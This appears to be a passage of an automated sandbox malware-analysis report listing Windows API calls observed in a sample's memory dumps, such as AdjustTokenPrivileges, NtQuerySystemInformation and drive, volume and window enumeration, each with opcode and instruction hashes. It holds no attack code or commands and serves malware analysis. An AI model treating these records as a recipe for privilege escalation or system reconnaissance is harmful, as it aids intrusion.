                                                    • Opcode Fuzzy Hash: 63424a90bdde8db31b10d1244b22e383e7d3b491a0b12a39fb3801a42e7d06a2
                                                    • Instruction Fuzzy Hash: B5D05E79644A818FE7168A1CC1A4B953BE4AF55B04F5644F9E840CB6A7C769F581D200
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120159192.0000000001F12000.00000040.00000001.sdmp, Offset: 01F12000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 313a42c5cb403a3ae1a7185e03817e3ea6f1a1f152fca2cb080ba018ee3e9c07
                                                    • Instruction ID: 1f64d884b1bd3cfa1a21ea6a4ae9dbe45e8d3adb7377695af5e862b426a5bc4a
                                                    • Opcode Fuzzy Hash: 313a42c5cb403a3ae1a7185e03817e3ea6f1a1f152fca2cb080ba018ee3e9c07
                                                    • Instruction Fuzzy Hash: 74D05E347006818FEB15CA1CC194F5977E4AF40700F1644E8BC008B26AC7A5E880D600
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Executed Functions

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0209AD37
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: 4a3f24c9276521123fd95cdcf45b3ed059ae311131c47928735143b55bcf534b
                                                    • Instruction ID: 69bb5fe569bd93fab1dd3145337adc3c773bc66c9e4d3fa7a1cf7efa11808353
                                                    • Opcode Fuzzy Hash: 4a3f24c9276521123fd95cdcf45b3ed059ae311131c47928735143b55bcf534b
                                                    • Instruction Fuzzy Hash: 7C2191755097849FDB138F25DC44B92BFF4EF06210F08859AE9858F563D3719908DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0209AD37
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: f200bd14cf93260f32801b63431a422dc9e82f84cebcc77f5f820a7b8933f026
                                                    • Instruction ID: 107a8c3193202785d67f51807ab5d61f18a052ef6bc72669e69c79ab00f6fe0d
                                                    • Opcode Fuzzy Hash: f200bd14cf93260f32801b63431a422dc9e82f84cebcc77f5f820a7b8933f026
                                                    • Instruction Fuzzy Hash: 4211A075601700DFEF21CF59D884B56FBE4EF04221F08C46AED4A8B622D731E418EB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0209B329
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: 73dcd641ac65aff859ba561c1097d80961f5a4ab62ccb40178a88c98467e5253
                                                    • Instruction ID: 09253bd4e46afea406562f6334491fa1de3beb247f1fef5357572e9d84eb22d6
                                                    • Opcode Fuzzy Hash: 73dcd641ac65aff859ba561c1097d80961f5a4ab62ccb40178a88c98467e5253
                                                    • Instruction Fuzzy Hash: BD11A071508380AFDB22CF11DC85F52FFB4EF06224F09C49AED894B662D375A818DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0209B329
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: fa4e04dd01bd5ee57bfc07368aa762b0855add46388c3165fb20d3e8b2440a33
                                                    • Instruction ID: 4a5e45bea51da6ac79957c2f2f32c3d736dfde805e8bd6d59b45a0e40f3ecd9f
                                                    • Opcode Fuzzy Hash: fa4e04dd01bd5ee57bfc07368aa762b0855add46388c3165fb20d3e8b2440a33
                                                    • Instruction Fuzzy Hash: 86018B31500740DFEF21CF05E885B25FBA0EF08624F08C19ADD8A0AA12D371A418EB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: 1b4d26f6d787e9384a9f5b79e33bbe6291eebecc002ff789cc368d390f00736a
                                                    • Instruction ID: d60d513856af7b40d3284946179cb93f872a8485a33df7e524e298062d1d2bc0
                                                    • Opcode Fuzzy Hash: 1b4d26f6d787e9384a9f5b79e33bbe6291eebecc002ff789cc368d390f00736a
                                                    • Instruction Fuzzy Hash: A731396650E3C08FEB138B759C65692BFB4AF07210F0E84DBD884CF1A3D6259809DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 0a06fd6f7b6b7099cc8ba8357f1313061ddb213f698a7fc0e63514d9ff5daf7e
                                                    • Instruction ID: a38cd2b53b021c7a6e36b7a819402ffe5c0fd62870d33262af7a6925c1ceed75
                                                    • Opcode Fuzzy Hash: 0a06fd6f7b6b7099cc8ba8357f1313061ddb213f698a7fc0e63514d9ff5daf7e
                                                    • Instruction Fuzzy Hash: CC318371504380AFEB22CF65DC85F52BFF8EF05210F09849EE9858B292D375E808CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: 11eb3559b7d900d69bf62ceb36c37dabc995000efb03676426a52f6bddcabc7d
                                                    • Instruction ID: 2c4c2d75d461448713916d3245ae73cdf73af75db4dd3834e2b177cfd400e947
                                                    • Opcode Fuzzy Hash: 11eb3559b7d900d69bf62ceb36c37dabc995000efb03676426a52f6bddcabc7d
                                                    • Instruction Fuzzy Hash: C6319871509384AFE712CB25DC45B96BFE8DF06214F0884AAE984DF293D375A909CB72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,71D427D5,00000000,00000000,00000000,00000000), ref: 0209BDBC
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: f9aa71b9ad30ce1e1cd6683a9210dbec3bc235f76ad0931f920f49d4b245f01a
                                                    • Instruction ID: 06b9efb9f8c70c2612a716569398d15e6c02f0e32a850b236a489443eb55da18
                                                    • Opcode Fuzzy Hash: f9aa71b9ad30ce1e1cd6683a9210dbec3bc235f76ad0931f920f49d4b245f01a
                                                    • Instruction Fuzzy Hash: 0531C571109380AFEB12CB61DC45F96BFBCEF06210F0885DBF985DB192D224A908C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,71D427D5,00000000,00000000,00000000,00000000), ref: 0209AFBE
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: f555770c496750f18eea85e76eff0d4baa49323bfb63849a6ab5ede6211109f8
                                                    • Instruction ID: 05a89c671b52355aecb37706d08f8b76d9bbe8991d905289fb42d1ba4c97a9d4
                                                    • Opcode Fuzzy Hash: f555770c496750f18eea85e76eff0d4baa49323bfb63849a6ab5ede6211109f8
                                                    • Instruction Fuzzy Hash: 8B21D5B2509380AFEB12CB20DC45B96BFB8EF06320F0884DAE985DB193D2259949D761
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: 244a99305c72f1d98e9d27789869cfb1e18d182deb7720f86be609ff1e3288e0
                                                    • Instruction ID: ade11223e62b9075b6b65ea593a973acccbd5a1047fc19a5e7994e816e016bf0
                                                    • Opcode Fuzzy Hash: 244a99305c72f1d98e9d27789869cfb1e18d182deb7720f86be609ff1e3288e0
                                                    • Instruction Fuzzy Hash: 1131917550E3C06FD3138B358C55B56BFB4AF43610F1A81DBD884CF2A3D228A909C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,71D427D5,00000000,00000000,00000000,00000000), ref: 0209B0AE
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: 423bcd1b9818e7122fa4def11dcd04b829bcd287d3705c6090df797bd24c33d8
                                                    • Instruction ID: 74c27637e8924ebb1346dc935e95bfadcf662e2e46b2b795d663a0bd6f5e020f
                                                    • Opcode Fuzzy Hash: 423bcd1b9818e7122fa4def11dcd04b829bcd287d3705c6090df797bd24c33d8
                                                    • Instruction Fuzzy Hash: 4621D371505380AFEB22CF11DC44FA6BFB8EF46220F08849AE945DB152D764E908CB71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • EnumWindows.USER32(?,00000E9C,?,?), ref: 0209A23E
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumWindows
                                                    • String ID:
                                                    • API String ID: 1129996299-0
                                                    • Opcode ID: 709969c9f64578378557f2a214a0b619d28d50fcd8dc7e66506a8e6acce16dfa
                                                    • Instruction ID: 4c24af5cd78accb7764fd7989d50f38998a14ea4243ee22bb2547cc6663ebc8d
                                                    • Opcode Fuzzy Hash: 709969c9f64578378557f2a214a0b619d28d50fcd8dc7e66506a8e6acce16dfa
                                                    • Instruction Fuzzy Hash: 4121B27190D3C06FD3128B258C55B66BFB4EF47620F1981DBD8848F693D329A919CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,71D427D5,00000000,00000000,00000000,00000000), ref: 02770819
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: 7135e88e99bc0ea63b1563220a9bb2a4cbe350ece13cffc3b5d8e146eb3b8365
                                                    • Instruction ID: 35dab866d92c40d72b1c744d16c2f87556516b54de0513f638078f1729dd23dc
                                                    • Opcode Fuzzy Hash: 7135e88e99bc0ea63b1563220a9bb2a4cbe350ece13cffc3b5d8e146eb3b8365
                                                    • Instruction Fuzzy Hash: 4521CBB5508780AFE712CB159C45BA3BFA8EF46720F0981DAFD859B153D2246909C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: 66b2995bdd46d3f1eaf84e98ae2d76aeb473ed38add6a36c5fc4afee3bc651dc
                                                    • Instruction ID: 7051852e14676d16761247f84c26c2afe27d0aaeb783781ccaa0e3c3533af4ec
                                                    • Opcode Fuzzy Hash: 66b2995bdd46d3f1eaf84e98ae2d76aeb473ed38add6a36c5fc4afee3bc651dc
                                                    • Instruction Fuzzy Hash: F2217F7550E3C0AFD3128B359C55B62BFB4EF47610F1A81CBD8848F693D225A919C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 4b423c76c6861b02eaea448d373c21ad5d56a851ca2ccb5a114bf8ab8b370279
                                                    • Instruction ID: 3d96ed9461695931e285f06db1ec35b63d0b8a2425126d40d50fca0229f58fe3
                                                    • Opcode Fuzzy Hash: 4b423c76c6861b02eaea448d373c21ad5d56a851ca2ccb5a114bf8ab8b370279
                                                    • Instruction Fuzzy Hash: DA21B071500304EFEB20DF65DC85F66FBE8EF08250F04846AED899B691D371E808CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,71D427D5,00000000,00000000,00000000,00000000), ref: 027708E5
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: a6861298a23e1915872047f87386d8378b829ab674046908f0df34fc83122af8
                                                    • Instruction ID: a5f42c3c7815e90c8e688ea85f338980f0dce706ad6d296b50ccbd48627d1e5d
                                                    • Opcode Fuzzy Hash: a6861298a23e1915872047f87386d8378b829ab674046908f0df34fc83122af8
                                                    • Instruction Fuzzy Hash: 2421B271409380AFEB22CF21DC45F56BFB8EF06310F09849BE9849B153C225A909CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0209A94A
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    • Opcode ID: 67232ad10f9e9ecdf1b56e3266ec9bc984c10fbafdc48c7bd288992a4dda4c96
                                                    • Instruction ID: bf56c403cd4c4b2caa539491391eabca46e25463fc20f2853ae9a06f25d3c577
                                                    • Opcode Fuzzy Hash: 67232ad10f9e9ecdf1b56e3266ec9bc984c10fbafdc48c7bd288992a4dda4c96
                                                    • Instruction Fuzzy Hash: F2219575509780AFD3138B259C51B62BFB4EF87620F0981DBEC848B653D224A919C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: 155f9f642dc71871fbde120793a067432560b12865c46e0d4a118f4e67cb7141
                                                    • Instruction ID: ee53cf0bb8e265e9e9372f7fddf1d2fa9431c84ee65941438321e3bac8f98581
                                                    • Opcode Fuzzy Hash: 155f9f642dc71871fbde120793a067432560b12865c46e0d4a118f4e67cb7141
                                                    • Instruction Fuzzy Hash: A9219F71600340AFEB20DB25DC85BA6FBD8EF04210F04846AEC48DB282D775E904CA61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,71D427D5,00000000,00000000,00000000,00000000), ref: 0209BDBC
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: 98d47f2677ecc70102a76c5c8577fe800252201ef15d537c5b89f36f11ea8d20
                                                    • Instruction ID: 1e6649e7edb8ac8be44efb0ce2bb8d1c076e0c7b8ef2fb114484357f884cf7bd
                                                    • Opcode Fuzzy Hash: 98d47f2677ecc70102a76c5c8577fe800252201ef15d537c5b89f36f11ea8d20
                                                    • Instruction Fuzzy Hash: 4F119D72500304EFEB21DF55DC85FAAFBECEF04324F04856AFD469A541E670A9489BB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,71D427D5,00000000,00000000,00000000,00000000), ref: 0209B0AE
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0209AB1A
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 0209BB2F
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: BufferConsoleInfoScreen
                                                    • String ID:
                                                    • API String ID: 3437242342-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,71D427D5,00000000,00000000,00000000,00000000), ref: 0209AFBE
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0209BA7E
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,71D427D5,00000000,00000000,00000000,00000000), ref: 027708E5
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: Flags
                                                    • String ID:
                                                    • API String ID: 3401871038-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 0209AA71
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0209AB1A
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,71D427D5,00000000,00000000,00000000,00000000), ref: 02770819
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 0209ABC9
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0209BA7E
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • EnumWindows.USER32(?,00000E9C,?,?), ref: 0209A23E
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumWindows
                                                    • String ID:
                                                    • API String ID: 1129996299-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 0209BB2F
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: BufferConsoleInfoScreen
                                                    • String ID:
                                                    • API String ID: 3437242342-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0209A94A
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 0209ABC9
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    Uniqueness

